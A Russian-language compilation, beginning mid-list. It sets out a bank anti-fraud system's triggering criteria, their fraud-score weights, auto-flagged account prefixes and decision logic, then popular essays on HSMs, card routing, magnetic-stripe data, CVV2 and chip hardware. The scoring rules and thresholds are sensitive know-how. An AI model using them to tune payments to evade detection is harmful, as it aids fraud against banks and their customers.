  55. Платеж на нового получателя (все счета клиента) Критерий срабатывает, если за анализируемый период ни с одного из счетов клиента платежей в пользу найденного счета получателя или номера карты не было, а сейчас такой платеж поступил;
  56. Появление платежа в пользу юридического лица Критерий срабатывает при первом появлении платежа с данного счета плательщика в пользу любого юридического лица за анализируемый период.
  57. Платеж на счет юридического лица Критерий срабатывает, если получателем платежа является юридическое лицо;
  58. Платеж на депозитный счет Критерий срабатывает, если счетом получателя является депозитный счет физического лица;
  59. Платеж в другой регион Критерий срабатывает, если 1-4 разряды слева БИК банка отправителя ? (не равно) 1-4 разряды слева БИК банка получателя.
  60. Количество платежей со счетов разных плательщиков - клиентов банка в пользу данного получателя больше лимита Критерий срабатывает, если в пользу указанного в платежном документе получателя платежа (счет/номер карты+БИК) за анализируемый период отправлено платежей от уникальных отправителей больше (строго больше), чем указано в настройках критерия.
  61. Присутствие получателя в справочнике террористов Критерий срабатывает, если ФИО из справочника террористов, указываемое в поле NAMEU, найдено в поле "Наименование получателя"
  62. Присутствие отправителя в справочнике террористов Критерий срабатывает, если ФИО из справочника террористов, указываемое в поле NAMEU, найдено в поле "Наименование отправителя"
  63. В назначении платежа найдено имя из справочника террористов Критерий срабатывает, если ФИО из справочника террористов, указываемое в поле NAMEU, найдено в поле "Назначение платежа"
  64. Превышение лимита платежей на счет получателя (банк) Критерий срабатывает, если в пользу указанного в платежном документе получателя платежа (счет/номер карты+БИК) за анализируемый период отправлено платежей больше (строго больше), чем указано в настройках критерия.
  65. Появление платежа на счет получателя с суммой выше средней (банк) Критерий срабатывает при поступлении платежа с суммой, превышающей среднюю сумму за анализируемый период времени с учетом допустимого отклонения.
  66. Появление платежа в пользу нового получателя услуги Критерий срабатывает, если при оплате услуги в дополнительных параметрах документа содержится информация о получателе, на которого платежи ранее не отправлялись
 
Критерий и количество начисляемых очков фрода
  1. Проверка RSA 0.5
  2. Присутствие IP-адреса в черном списке 0.5
  3. Появление платежа в пользу нового получателя 0.5
  4. Присутствие получателя в черном списке 1
  5. Присутствие банка получателя в черном списке 0.8
  6. Подозрительные фразы в назначении платежа 0.5
  7. Нарушение сквозной нумерации платежей организации 0.2
  8. Смена IP-адресов 0.2
  9. Смена диапазона IP-адресов 0.2
  10. Смена оборудования 0.2
  11. Смена пароля 0.2
  12. Появление платежа на счет получателя с суммой выше предельной 0.2
  13. Появление ошибочных платежей 0.5
  14. Снижение предельного остатка на счете 0.2
  15. Смена типового времени получения платежа 0.2
  16. Подверженность клиента мошенническим атакам 0.5
  17. Несколько неудачных попыток ввода пароля при входе в систему 0.2
  18. Превышение суточного количества платежей за период 0.2
  19. Подозрительные ФИО получателя 0.5
  20. Появление платежа на счет получателя с суммой выше средней 0.2
  21. Получатель платежа присутствует в белом списке 0
  22. Появление платежа в пользу нового получателя услуги 0.5
  23. Отправка платежа из другой страны 0.25
  24. Быстрая смена региона отправки платежа 0.75
  25. Появление платежа на новую карту физического лица 0.5
  26. Присутствие ФИО получателя в базе утерянных паспортов 0.8
  27. Присутствие ФИО руководителя компании в базе утерянных паспортов 0.8
  28. Превышение допустимого количества решений арбитражного суда 0.2
  29. Превышение допустимого количества компаний, зарегистрированных по указанному адресу 0.2
  30. Учредитель компании получателя платежа является «массовым» учредителем 0.5
  31. Частая смена руководителя компании получателя платежа 0.2
  32. Компания получатель платежа является новой 0.2
  33. Компания получатель платежа является банкротом 0.8
  34. Финансовое состояние компании получателя платежа является нестабильным 0.2
  35. Сумма платежа меньше пороговой 0
  36. Проверка RSA 0.5
  37. Присутствие IP-адреса в черном списке 0.5
  38. Присутствие MAC-адресa в черном списке 0.5
  39. Появление платежа в пользу нового получателя 0.2
  40. Присутствие получателя в черном списке 0.8
  41. Присутствие банка получателя в черном списке 0.2
  42. Подозрительные фразы в назначении платежа 0.5
  43. Нарушение сквозной нумерации платежей организации 0.2
  44. Смена IP-адресов 0.2
  45. Смена диапазона IP-адресов 0.2
  46. Смена оборудования 0.2
  47. Появление платежа на карточный счет/счет физического лица 0.3
  48. Появление платежа на новый карточный счет/счет физического лица 0.3
  49. Появление платежа на сводный счет/счет заработной платы 0.3
  50. Смена пароля 0.2
  51. Появление платежа на счет получателя с суммой выше предельной 0.2
  52. Появление платежа на карточный счет/счет физического лица с суммой выше предельной 0.2
  53. Появление ошибочных платежей 0.5
  54. Снижение предельного остатка на счете 0.2
  55. Появление запросов выписки 0.2
  56. Смена типового времени получения платежа 0.2
  57. Подверженность клиента мошенническим атакам 1
  58. Несколько неудачных попыток ввода пароля при входе в систему 0.2
  59. Появление платежа на сводный счет/счет заработной платы с суммой выше предельной 0.2
  60. Превышение суточной суммы платежей за период 0.2
  61. Превышение суточного количества платежей за период 0.2
  62. Подозрительные ФИО получателя 0.5
  63. Появление платежа на счет получателя с суммой выше средней 0.2
  64. Появление платежа на счет физического лица, обслуживающегося в другом банке 0.2
  65. Превышение лимита платежей со счетов разных плательщиков - клиентов банка в пользу одного физического лица 0.8
  66. Превышение лимита зарплатных платежей со счетов разных плательщиков - клиентов банка в пользу одного физического лица 0.8
  67. Появление зарплатного платежа в пользу нового получателя 0.2
  68. Превышение лимита зарплатных платежей на карточный счет/счет физического лица 0.2
  69. Отправка срочного платежа 0.2
  70. Превышение лимита платежей на карточный счет/счет физического лица 0.2
  71. Появление платежа на депозитный счет физического лица 0.2
  72. Слишком малое время между формированием платежа и его отправкой 0.8
  73. Отправка платежа с незащищенного рабочего места 0.2
  74. Отправка платежа клиентом с низким уровнем защиты 0.2
  75. Появление платежа с уже имеющимся номером 0.2
  76. Превышение лимита платежей со счетов разных плательщиков - клиентов банка в пользу одного юридического лица 0.8
  77. Получатель платежа присутствует в белом списке 0
  78. Отправка платежа из другой страны 0.8
  79. Быстрая смена региона отправки платежа 0.8
  80. Появление платежа на новую карту физического лица 0.2
  81. Присутствие ФИО получателя в базе утерянных паспортов 0.8
  82. Присутствие ФИО руководителя компании в базе утерянных паспортов 0.8
  83. Превышение допустимого количества решений арбитражного суда 0.2
  84. Превышение допустимого количества компаний, зарегистрированных по указанному адресу 0.2
  85. Учредитель компании получателя платежа является «массовым» учредителем 0.5
  86. Частая смена руководителя компании получателя платежа 0.2
  87. Компания получатель платежа является новой 0.2
  88. Компания получатель платежа является банкротом 0.8
  89. Финансовое состояние компании получателя платежа является нестабильным 0.2
  90. Сумма платежа меньше пороговой 0
  91. Платеж в пользу нового получателя-физического лица, обслуживающегося в другом банке. Правило срабатывает при отправке клиентом банка платежа в пользу нового получателя физического лица из другого банка, на которого ранее за анализируемый период ни с одного из счетов клиента платежей не было. 0.3
  92. Платеж в пользу нового получателя-физического лица, обслуживающегося в другом банке. Правило срабатывает при отправке клиентом банка платежа в пользу нового получателя физического лица из другого банка, на которого ранее за анализируемый период ни с одного из счетов клиента платежей не было. 0.3
  93. Превышен лимит суммы платежа в банк из черного списка. Правило срабатывает при появлении платежа, сумма которого превышает заданный лимит, а банк получателя платежа содержится в справочнике «Черный список банков». 0.3
  94. Превышен лимит суммы платежа в банк из черного списка. Правило срабатывает при появлении платежа, сумма которого превышает заданный лимит, а банк получателя платежа содержится в справочнике «Черный список банков». 0.3
  95. В платеже найдены данные из справочника террористов. Правило срабатывает, если имя из справочника террористов, указываемое в поле NAMEU, найдено хотя бы в одном из полей платежного документа: "Наименование отправителя", "Наименование получателя" или "Назначение платежа" 0.7
  96. В платеже найдены данные из справочника террористов. Правило срабатывает, если имя из справочника террористов, указываемое в поле NAMEU, найдено хотя бы в одном из полей платежного документа: "Наименование отправителя", "Наименование получателя" или "Назначение платежа" 0.7
  97. Превышение лимита платежей на счет получателя (банк) 0.2
  98. Превышение лимита платежей на счет получателя (банк) 0.2
 
## Из базы

1) Категории счетов, по которым сразу присваивается признак "fraud"

Код:
ID	Prefix	Description	FraudRate	Version
1	40802	Физические лица - индивидуальные предприниматели	100	0
2	40803	Физические лица-нерезиденты - счета типа "И"	100	0
3	40804	Юридические лица и индивидуальные предприниматели-нерезиденты - счета типа "Т"	100	0
4	40805	Юридические лица и индивидуальные предприниматели-нерезиденты - счета типа "И"	100	0
5	40806	Юридические и физические лица-нерезиденты - счета типа "С" (конверсионные)	100	0
6	40807	Юридические лица-нерезиденты	100	0
7	40809	Юридические и физические лица-нерезиденты - счета типа "С" (инвестиционные)	100	0
8	40810	Физические лица - средства избирательных фондов	100	0
9	40811	Средства для проведения выборов. Избирательный залог	100	0
10	40812	Юридические и физические лица-нерезиденты - счета типа "С" (проектные)	100	0
11	40813	Физические лица-нерезиденты - счета типа "Ф"	100	0
12	40814	Юридические и физические лица - нерезиденты - счета типа "К" (конвертируемые)	100	0
13	40815	Юридические и физические лица - нерезиденты - счета типа "Н" (неконвертируемые)	100	0
14	40817	Физические лица	100	0
15	40818	Специальные банковские счета нерезидентов в валюте Российской Федерации	100	0
16	40819	Специальные банковские счета резидентов в иностранной валюте	100	0
17	40820	Счета физических лиц-нерезидентов	100	0
18	423	Депозиты и прочие привлеченные средства физических лиц	100	0
19	426	Депозиты и прочие привлеченные средства физических лиц-нерезидентов	100	0
20	455	Кредиты, предоставленные физическим лицам	100	0
21	457	Кредиты, предоставленные физическим лицам – нерезидентам	100	0
22	45814	Просроченная задолженность по предоставленным кредитам и прочим размещенным средствам физическим лицам – индивидуальным предпринимателям	100	0
23	45815	Просроченная задолженность по предоставленным кредитам и прочим размещенным средствам гражданам	100	0
24	45817	Просроченная задолженность по предоставленным кредитам и прочим размещенным средствам физическим лицам - нерезидентам	100	0

2) круглые суммы - 100к, 1кк ровно и т.п.

3) нарушение сквозной нумерации платежных документов на 10 единиц
## из документации

Для всех правил задаются границы вероятностей (0-100%) мошеннических, подозрительных и правомочных платежей.

Результат автоматической проверки платежа формируется следующим образом:

Если хотя бы по одному из правил его вероятность попадает в границы мошеннических платежей, то платеж считается мошенническим (FRAUD).

Если нет ни одного правила, по которому его вероятность попадает в границы мошеннических платежей, но есть хотя бы одно правило, где его вероятность попадает в границы подозрительных платежей, то платеж считается подозрительным и требует ручной проверки (ПРОВЕРИТЬ).

Если ни по одному правилу платеж нельзя отнести ни к мошенническим, ни к подозрительным, то платеж считается правомочным (OK).
 
Криптографическое сердце банка
WOzbahrl.png

Если банк выпускает карты, то у него должно быть интересное такое устройство - HSM (Hardware Security Module), или иногда их называют крипто-компьютерами.
Для того, чтобы обрабатывать транзакции по картам, приходится производить множество криптографических операций: шифрование, дешифрование, вычисление электронной подписи, проверка электронной подписи, генерация ключей (секретов) для всех этих алгоритмов, хранение и защита всех этих ключей... И ряд других функций.
Представьте себе ситуацию: где-то в банке хранится ключ, с помощью которого подписываются важные данные. Если завладеть этим ключом - то можно подписывать произвольные данные, выдавая их за реальные транзакции. Запросто можно разорить и банк, и его клиентов. Так вот для того, чтобы хранить все эти ключи в надежном месте - используется HSM. Это специальный компьютер (пример - на фото), у которого масса всяких защит. Например, если он обнаружит, что кто-то пытается взломать его корпус - он физически уничтожает жесткие диски внутри себя, чтобы не достаться врагу!
Все самые важные ключи, нужные для процессинговой работы, хранятся в нем. И за пределы HSM ни один ключ в открытом виде не выходит. Единственный случай, когда ключи могут покинуть HSM - это при резервном копировании. Но даже в этом случае они сначала шифруются другим, транспортным ключом, и только потом, в зашифрованном виде могут покинуть эту злую коробочку. Но как же выполнять тогда все эти шифрования-дешифрования?
А так. Их сам HSM и выполняет. Это очень мощный компьютер, заточенный на решение таких задач. Понятно, что если он будет тормозить - автоматически начнут тормозить все эти расчеты по картам, поэтому требования по производительности у нему - о-го-го! Учитывая, что многие эти вычисления бывают довольно ресурсоемкие...
Короче, железка такая и сверхзащищенная, и сверхпроизводительная. Программа по обслуживанию карт по сети отправляет зашифрованное сообщение этому HSM и просит расшифровать, применяя ключ номер такой-то. Назад приходит расшифрованное сообщение. Хочешь зашифровать? Отправляешь HSM открытый текст, называешь номер ключа, который надо использовать - назад получаешь зашифрованное сообщение. И так со всем остальным. Понятно, что чтобы HSM тебе ответил - надо чтобы он доверял. Тут тоже есть шифрование, пароли, аппаратные файрволы и т.п.
Цена этого HSM сильно варьируется, но сопоставима с ценой хорошей квартиры. В Москве. А банку их надо всегда в двойном экземпляре. Один рабочий, другой резервный. Как минимум два. Если еще сам карты выпускаешь - то еще два. А если еще интернет-платежи поддерживаешь - еще два... Дорого. Поэтому бывают организации - "процессинговые центры", котоыре сами банками не являются, а только продают услуги по обработке. Для маленьких банков - само то!

Доходят ли ваши транзакции до процессинга "Визы"?

Скорее всего, когда вы раньше производили оплату картой какого-нибудь российского банка в российском магазине - ваша транзакция на самом деле ни в какую Визу или Мастеркард не отправлялась. То есть вообще ни Виза, ни Мастекард ничего не знали о вашей операции.
Я написал "раньше", потому что сейчас это уже 100% так, а раньше было - "скорее всего".

Дело вот в чем.

Если у вас карта, к примеру, "Схорони-банка", и вы идете в магазин, где POS-терминал обслуживается "Фальшь-банком", то надо как-то транзакцию переслать из Фальшьбанка в Схорони-банк. Ну и назад переправить подтверждение. Как организовать такое путешествие?

Возможности, собственно, две. Первая - прямая договоренность между Схорони-банком и Фальшьбанком о процессинге транзакций. Вторая - когда каждый из этих банков - участник Международной Платежной Системы (МПС их сокращенно называют) - Визы, Мастеркарда, JCB, UnionPay и т.д. И тогда Фальшьбанк отправляет транзакцию в платежную систему, а та пересылает запрос на транзакцию в Схорони-банк. Схорони-банк проверяет баланс и отправляет в платежную систему подтверждение. Дальше платежная система пересылает это подтверждение в Фальшь-банк, а тот уже переправляет ответ POS-терминалу, который радостно печатает чек, что оплата прошла. Собственно, именно для этого в свое время и возникли международные платежные системы. Которые на тот момент были просто платежными, потом национальными платежными, а потом бизнес пошел в гору и стали они международными платежными.

Так вот, МПС за это удобство берут деньги, и, в общем-то, не сказать чтобы совсем маленькие. Банки платят за каждую транзакцию в системе. Понятно, что любимое занятие любого бизненса, помимо повышения продаж - снижать операционные издержки. Каким образом?

Сначала некоторые банки просто объединялись, чтобы пересылать транзакции между собой. Например, Фальшьбанк видит, что у него очень много транзакций по картам Сохрани-банка. Сохрани-банк и Фальшьбанк договариваются, и начинают экономить на комиссиях МПС. Потому что в этой схеме системе платить совершенно ничего не нужно, банки гоняют транзакции между собой и в ус не дуют. А дополнительную прибыль делят между собой.

Потом эти объединения (карточные ассоциации) стали расти и становиться похожими на те самые МПС - т.е. уже есть какой-никакой центр, куда члены этой организации переправляют транзакции, а этот центр переправляет транзакции кому надо. Назовем этот центр Хаб.

Технически выглядит так: в терминал Фальшбанка вставляется карта Схорони-банка. Фальшьбанк видит, что карта - одного из банка Хаба, и отправляет транзакцию в Хаб. Хаб пересылает транзакцию в Схорони-банк и т.д. Всё выглядит точно так же как с Визой, только до визы транзакция не долетает. Выгода в том, что содержать и обслуживать Хаб всем членам Хаба выгоднее, чем платить денег Визе. Причем для держателей карт ничего странного не происходит, они даже не подозревают, что до Визы данные не доходят.

Но если в терминал Фльшьбанка пришел клиент с картой ИТД-24, который не является членом Хаба, то или сам Фальшьбанк переправляет запрос обычным путем (через Визу), или Хаб делает это вместо Фальшьбанка. Всё прозрачно на самом деле.

А потом пришел ФЗ "О национальной платежной системе". Который прямо заявил: абсолютно все транзакции внутри страны должны проводиться через Национальную Систему Платежных Карт. Спасибо санкциям. Там, где бизнес долго не мог договориться, кто будет главным - государство создало закон. Без санкций, наверное, еще долго бы не договорились.

Кстати, эта НСПК в целом использует те же самые технологии, те же схемы взаимодействия и т.п. Я ж говорю - технологически мы были давно готовы.

Но, насколько мне известно, всё-таки по имеющимся договоренностям, какая-то информация из НСПК в МПС всё-таки переправляется, обмен данными происходит. Как минимум, если российская карта обслуживается за границей - там уже работает МПС. И эти МПС должны переслать транзакцию в НСПК, (которая, в свою очередь, пересылает её в банк-издатель карты). Виза просто так этого делать не будет, и потому совсем изолироваться от МПС не получается. Что-то и мы им вынуждены отдавать. Что именно - закрытая информация, и мне неизвестная.
 
Что находится на магнитной полосе карты

HIAU5PTl.png

Вообще карта с магнитной полосой - динозавр, который должен был умереть уже давным давно. На дворе эпоха криптоактивов уже давно :)

Но, спасибо самому отсталому рынку, такие карты все еще существуют. Как вы думаете, кстати, какой рынок самый отсталый в смысле карточных технологий? Не поверите... США! Кроме шуток. А самый развитый?.. Не так сложно догадаться. Азиатский! А российский - где-то ближе все-таки к переднему краю. От азиатского немного отстаем, но в целом - весьма на уровне.

С США все просто. Поскольку родина карт - США, то там и больше всего оборудования по приему. А оно до сих пор работает, чего его просто так менять? К тому же, основные платежные системы - родом оттуда, а потому защищают интересы банков США и не принуждают (хотя подталкивают) к замене оборудования.

В общем, содержимое магнитной полосы представляет, скорее, академический интерес. Его и будем сегодня удовлетворять.

На магнитной полосе находится три дорожки, или три трека. Стандартизированы только первые два. Общих стандартов на третий трек нету (хотя отраслевые или частные стандарты существуют). Первые два трека предназначаются только для чтения (хотя технически переписать их можно). А третий предназначался и для чтения и для записи. Но в народ он не пошел.

Когда разрабатывались карты, решались две несвязанные, но похожие задачи. Одна задача - для автоматической регистрации пассажиров в авиакомпаниях, вторая задача - автоматизация оплаты. Поскольку разрабатывал оборудование для обеих задач IBM, то он и решил объединить решения. Треки 1 и 2 различаются плотностью записи (трек 1 вмещает больше). Содержимое у них очень похожее, хотя немного различается.
aWvrw91l.png

Служебные символы на самом деле могут быть разными, есть несколько вариантов. После стартовых символов идет номер карты - должен быть точно такой же, как и тот, который написан на самой карте. Номер этот называется PAN - Primary Account Number, номер основного счета. Но на практике он никогда не совпадает с номером счета в банке (в силу законодательных требований к номеру счета, например). Вообще-то он состоит из идентификатора банка (Bank Identification Number), номера счета и контрольного символа.

BIN банк получает у платежной системы, когда входит в нее. За каждой платежной системой закреплены свои начальные цифры, поэтому, глядя на номер карты, можно понять, к какой платежной системе она относится.

После PAN идет имя и фамилия держателя (кстати, именно этих данных нет на втором треке, это основная разница). Затем идет три важных блока данных.

Срок действия карты - четыре цифры. Первые две - год, вторые - месяц.

Дальше - т.н. код обслуживания (Service Code) из трех цифр. Первая цифра значит тип карты. Если это 1 или 5 - то карта с магнитной полосой. Если это 2 или 6 - то карта с чипом. Значения 5 и 6 значат, что карта для операций только внутри страны, а 1 и 2 - что можно пользоваться в других странах тоже.

Вторая цифра говорит о правилах проверки карты. Например, 0 - PIN можно не проверять, 2 - PIN проверяется всегда.

Последняя цифра - о правилах обслуживания карты. Можно, например, запретить снимать наличку (только оплата в терминалах) и т.д.

Следующий важный блок - Discretionary Data. Данные для проверки карты. Вообще здесь нет единого стандарта, каждый издатель карты может на свой лад использовать этот блок. Но типично здесь находятся такие значения, как CVV (Card Verification Value) и PVV (PIN Verification Value) вместе с необходимым для него PVKI.

Глубоко копаться не будем, объясню простыми словами, что это за данные и зачем они.

Нужны они для того, чтобы проверить правильность сообщенных данных. Значения CVV и PVV вычисляются с помощью секретных ключей, которые знает только банк-издатель. И то и другое значение устроено так, что получить из них исходные данные невозможно. Чтобы проверить правильность, банк повторяет те же самые действия над введенными данными и получает рассчетные значения PVV и CVV, и сравнивает их с теми, что хранятся у него в базе данных. Если совпадают - то исходным данным можно верить.

В конце трека находится символ LRC (Longitude Redundancy Check) - специальное значение, которое вычисляется по всем остальным символам трека. Задачу он решает чисто техническую - если трек считался с ошибкой, то LRC не совпадет. LRC - довольно простое значение, никакого шифрования, ничего. Просто контроль целостности. Подобные алгоритмы контроля целостности данных используются почти во всех каналах связи.

Ну и последнее, почему данные на треках различаются.

Если у вас поврежден трек 1, но трек 2 успешно читается - в поддавляющем большинстве случаев вы даже ничего не заметите, потому что для банковских карт второй трек главный. Единственное исключение - если карта кредитная, и вы выполняете операцию кредитования. Тогда без первого трека никуда не уедешь. А связано это с тем, что должен печататься кредитный договор (или специальный чек), в котором обязательно указывается имя и фамилия держателя. А взять их можно только с первого трека.

Цифры с обратной стороны карты, или CVV2

ZekqNPol.png

Все мы хотя бы раз оплачивали что-то через интернет. И в большинстве случаев, указывая реквизиты карты, мы вводили три цифры с обратной стороны карты. Вообще говоря, там не три, а больше :) Как на картинке, например. Там вы видите семь цифр. Просто первые четыре цифры повторяют последние четыре цифры номера (PAN) карты. Да, все просто. Это для удобства ввода и проверки. А последние три цифры (на картинке обведены красным) - это как раз CVV2/CVC2 значение. Переводится как Card Verification Value 2 (значение проверки карты - 2) или Card Verification Code 2 (Код проверки карты - 2). Первое название используется в МПС VISA, второе название - в MasterCard. А вычисляются они одинаково абсолютно, алгоритм один, назвали почему-то по-разному. Так все через дробь и пишут.

Так вот, CVV. Card Verification Value (Card Verification Code). Точнее, CVV2/CVC2. Цифра 2 говорит о том, что где-то есть и "номер один". И это действительно так, на магнитной дорожке карты, а так же на чипе микропроцессорной карты есть значение CVV, без номера. Оно играет роль как бы цифровой подписи нескольких значений, связанных с картой. А именно:
- PAN (номер карты)
- Expiration Date (срок действия карты)
- Service Code (код обслуживания), состояший из трех цифр, указывающих:
Тип и применимость карты (чиповая/магнитная, разрешены ли международные операции)
Нужно ли обрабатывать транзакции в on-line режиме
Ограничения на карту: нужен ли PIN, можно ли снимать деньги или только оплачивать в POS-терминалах и т.д.
Все эти значения (PAN, ExpDate и Service Code) определенным образом смешиваются и шифруются специальным секретным ключом банка. Получается длинная строка в шестнадцатеричном виде. Из нее выписывают первые три цифры (а там еще могут быть и буквы, от A до F, ведь это шестнадцатеричное число). Эти три цифры и есть CVV (CVC). Их записывают на магнитную полосу или в Track 2 Equivalent Data тэг в чипе карты. Эти данные служат для проверки данных карты при проведении операции по карте.

А CVV2/CVC2 используются в ситуации, когда карта не присутствует. Card Not Present. Странно, да? Да нет, все просто. Сидите вы за компьютером и хотите оплатить что-то. В компьютер карту не вставишь (а если и есть считыватель карт, то нет соответствующего софта и договора с банком-эквайером), поэтому данные карты вводятся руками, а не читаются с самой карты. Именно это подразумевается, когда говорят, что карта не присутствует. И кстати да, у вас эти данные могут быть на бумажечке рядышком, саму карту иметь не обязательно. Поэтому кстати, существует такая вещь, как виртуальная карта. Большинство банков предлагает такую услугу. Нужна она потому, что ее легко контроллировать: легко закрыть или ограничить, не стесняя обычную карту. Виртуальная карта существует только в БД банка и в вашем блокноте (файле).

На магнитную полосу (и в чип) эти данные (CVV2/CVC2) не записывают.

А вычисляется CVV2/CVC2 точно так же, как и CVV/CVC, но есть два отличия. Первое - код обслуживания ставится равным "000". Это бессмысленная цифра с т.зр. спецификации. Специально, чтобы никто не мог использовать это значение для записи на магнитную полосу поддельной карты. Ну и шифрование выполняется другим ключом, специально предназначенном для CVV2/CVC2.

Издатель карты (банк-эмитент) может проверить правильность ввода точно так же, как и с CVV/CVC - он повторяет вычисления, применяя ключ, который хранится у него в секрете. И если получается тот же результат - данные валидны.

Но украсть это значение несложно...
 
Как устроен чип банковской карты

На самом деле чип на карте - это полноценный микрокомпьютер, и порй весьма сложный.

Без центрального процессора никакой компьютер работать не сможет. Поэтому это устройство идет первым пунктом. Кстати, на всякий случай объясню, что эта многоножка делает вообще. Самое сердце микропроцессора - его Арифметико-Логическое Устройство (АЛУ). Точнее, не сердце, а его "думалка". Другой орган, может и поважнее сердца. Именно этим местом процессор выполняет конкретную операцию над числами (операндами). А какую именно операцию - определяется по текущей команде программы. Процессор этим своим АЛУ умеет выполнять строго ограниченный набор операций. "Строго ограниченный" - не значит "маленький", а значит "ничего другого сверх того, что есть в этом наборе". И именно этим разнообразием (в некоторых случаях весьма большим) команд и обеспечивается универсальность микропроцессорного устройства. До изобретения процессора устройства могли выполнять только строго заданную операцию (пусть даже и весьма сложную). А с появлением процессора возникла возможность на одном и том же устройстве выполнять разные операции, да еще и определяемые без изменения структуры устройства, одним написанием программы.

Микрочип пластиковой карты содержит микропроцессор разрядностью 8, 16, или уже даже 32 разряда. Т.е., как мы видим, вполне серьезная такая штука. Обычно это RISC-процессоры, которые зарекомендовали себя как устройства с более прогнозируемым временем выполнения разных команд (тот самый "строго ограниченный набор операций"). Все потому, что каждая команда выполняется за один такт процессора. Противоположный подход, с большим набором команд, выполняющихся за разное количество тактов - в архитекутре CISC.

Частоты, на которых работают микропроцессоры карт, лежат в диапазоне 1-33 МГц, но у рекордсменов показатели достигают 66 МГц при разрядности в 32 бита. А может быть, сейчас уже и выше.

Кстати говоря, чиповые карты называются "микропроцессорными", хотя термин этот не совсем точен. Дело в том, что на самом деле чип карты представляет собой, скорее, микроконтроллер, или даже более того - SoC (System-On-Chip), целую систему. Тогда как микропроцессор - это просто главный узел микроконтроллера (или системы на чипе). Говорю это потому, что в чипе карты присутствует еще весьма большое количество других устройств. Переходим к ним.

На чипе карты размещена еще память, причем целых три вида. Это ROM (память только для чтения), RAM (оперативная память, на чтение и запись) и EEPROM (электрически перепрограммируемая память, энергнонезависимая; для простоты - что-то вроде флэшки, но не флэш, там немного другая технология).

Прежде, чем рассказать о емкости этой памяти, нужно небольшое отстутпление. Как вы знаете, все элементы микрочипа "наносятся" на поверхность кристалла кремния. При этом они занимают какую-то площадь на нем. Чем сложнее устройство, которое мы формируем на кристалле, тем больше необходимая площадь кристалла (при одной и той же технологии ненасения). Так вот, меньше всего места требует ROM. Связано это с его простым устройством. При записи ("прошивании") ROM там фактически просто пережигаются "перемычки" с помощью повышенного тока. Назад уже никак, на то оно и read-only. Но и от питания или его отсутствия состояние перемычек уже никак не зависит.

Примерно в 4 раза больше места на чипе занимает 1 бит памяти EEPROM. Дополнительное место уходит на то, чтобы добавить структуры управления ячейкой памяти. Содержимое этой памяти не зависит от наличия питания.

И максимальное место, в 16 раз (!) больше, занимает RAM. Все потому, что реализуется ячейка такой памяти с помощью триггеров, а это такие устройства, для которых надо использовать несколько транзисторов (плюс пассивные элементы), что и требует соответствующего места.

Так вот, размер ROM обычно 16-196 Кб, хотя есть карты с размером ROM более 256 Кб. В эту память прошивается операционная система и системные приложения.

RAM вмещает обычно от 256 байтов до 4 Кб. Для Java-карт размер обычно лежит в пределах от 4 до 8 Кб, хотя на рынке есть предложения до 16Кб. Небольшая, правда? Здесь хранятся переменные программы, буферы и проч. С отключением питания эта память превращается в тыкву.

EEPROM обычно вмещает от 2 до 72 Кб, но известны карты с размером до 1 Мб. Прям почти целая флэшка в бумажнике. Чем хороша эта память - при отключении питания она все сохраняет. Здесь хранятся ключи, журналы, настройки, да и вообще любые файлы.

На чипе может быть криптосопроцессор. Это, с одной стороны, более "тупое" устройство, которое умеет намного меньше, чем центральный процессор. Но зато он умеет это делать намного лучше! Дело в том, что криптографические операции - весьма ресурсоемкая задача. Особенно, если речь идет об асимметричной криптографии. При той же криптостойкости вычисления для асимметричной криптографии занимают на два порядка (в 100 раз!) больше времени. А это уже весьма заметно. Например, шифрование открытым ключом на центральном 8-разрядном процессоре пластиковой карты может занять 10-20 секунд (!), в то время как нормальный криптосопроцессор выполняет эту операцию за пару десятков милисекунд. С учетом того, что полное время обработки транзакции не должно превышать 3 секунды, вариант с центральным процессором отпадает. Поэтому для карт без криптосопроцессора некоторые виды аутентификации просто недоступны. Как итог - транзакция проходит с гораздо меньшим уровнем безопасности (SDA-аутентификация). Вроде бы зачем тогда такие чипы? А дело в том, что криптосопроцессор заметно удорожает чип, а учитывая то, что карточный бизнес для банка в основном убыточен, криптосопроцессоры встречаются уже не в самых дешевых картах, все-таки не Visa Electron, а что-то посерьезнее.

Из более-менее экзотических устройств, пожалуй, упомним еще генератор случайных чисел. Дело в том, что в криптографических вычислениях широко применяются случайгые числа. От генерации ключей до добавления случайного числа в подписываемый запрос. Но тут есть нюанс. В обычных компьютерах специального устройства, которое было бы источником случайных чисел, нет. В них используется генератор псевдослучайных чисел. Для формирования числа используется разнообразная информация, преимущественно - текущие показания (в микро-тиках) часов реального времени. Но числа, которые генерирует этот генератор, не являются абсолютно случайными, и в таких чувствительных вещах, как криптографические вычисления, их использовать недопустимо. Кстати, вспомнил, что одна преступная группировка разработала способ обыгрывать игровые автоматы, потому что в них использовался генератор псевдослучайных чисел. Там какой-то непростой такой алгоритм был... Интересная схема, где игрок через телефон (специально разработанное приложение) фиксировал время реакции программы в какой-то момент времени, это значение сообщники использовали для расчетов ставки... Собственно, главное, что из этого следует - если есть "псевдо" в случайности, то безопасность резко снижается. Поэтому на карте может быть специальное устройство, которое генерирует по-настоящему случайное значение.

Для взаимодействия с внешним миром на чипе есть еще такая штука - UART, асинхронный приемо-передатчик. Именно его лапки выведены на контактные площадки карты. У карты ведь нет ни монитора, ни терминала, а взаимодейтсвовать с внешним миром ей как-то надо. Вот этим и занимается это устройство.

Кроме него на карте может быть еще.... Та-дам!... USB-интерфейс!

Если на карте не шесть площадок, а восемь, то с большой вероятностью нижние две, которые в стандарте обозначены как "зарезервированные для будущего применения", подразумевают подключение по USB v1.1 (до 12 МБит/с, на всякий случай).

Ну и чтобы все эти устройства на чипе могли между собой взаимодействовать, там есть еще всякие контроллеры типа контроллер доступа к памяти, контроллер магистральной шины, тактовый генератор (до какого-то момента, кстати, тактового генератора на картах не было, использовался сигнал тактирования, подаваемый терминалом) и много других служебных устройств.

Операционная система в банковской карте

Раз чиповая карта представляет собой микрокомпьютер, то неудивительно было бы обнаружить в ней и операционную систему. И знаете, что? Она там правда есть! Конечно, не Windows 10 и не Linux... Своя, операционная система, адекватная тем задачам, которые решает карта.

На самом деле этих операционных систем даже не одна... Тысячи их! В смысле, в природе, а не на конкретной карте. Вообще любой производитель чипа (а именно он первоначально "прошивает" чип) сам разрабатывает свою операционную систему. И он волен делать это так, как он сам решит. Каждый отдельный чип - это уникальная конфигурация. Уникальная система команд центрального процессора, уникальные размеры памяти, разные устройства на чипе (да, их там много!) и т.д. Соответственно, операционная система должна уметь со всем этим самостоятельно обращаться.

